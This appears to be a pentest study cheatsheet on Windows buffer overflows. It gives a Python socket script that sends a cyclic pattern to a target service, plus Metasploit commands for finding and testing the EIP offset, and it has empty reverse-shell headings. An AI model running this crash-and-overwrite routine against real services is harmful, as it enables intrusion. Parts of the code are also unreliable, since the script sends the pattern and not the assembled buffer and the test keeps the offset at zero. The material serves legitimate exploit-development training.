Skip to main content

Resource,Tips,Tricks.

info

various tools, cheatsheets and techniques related to buffer overflows.

Techniques

Buffer Overflow Shortcut

S/o to @noodlesnz for this one:

When doing the first 3 steps of the "Windows x86-64" overflow process- fuzzing, offset and eip- you can shortcut those steps by doing this

First, create some arbitrarily big pattern using Metasploit's pattern_create.rb script e.g. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 6700

Send your payload off like this:

#!/usr/bin/env python3

import socket

ip = "172.16.2.125" # IP of the target server.
port = 9999

offset = 0 # this should be zero'd out
overflow = "A" * offset
retn = "" # this will be the address you find later
padding = "" # optional.
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0A..."
postfix = "" # optional

buffer = overflow + retn + padding + payload + postfix

print("buffer=",len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(payload + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")

Next, after the app crashes, read the value in the EIP e.g. something like this 48367648

Now use the pattern_offset.rb script from Metasploit to find the offset e.g. /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 6700 -q 48367648

You now have your offset!

Test it changing the python3 script to these values (say your offset was 6108):

offset = 0 # this should be zero'd out 
overflow = "A" * offset
retn = "BBBB" # this will overwrite the EIP.
padding = "" # optional.
payload = ""
postfix = "" # optional

And when you run the script again, if everything goes to plan, you will see 42424242 written to the EIP register.

Tools

Reverse Shells

Upgrade your Shell

TBC: methods to upgrading and stabilizing your reverse shells.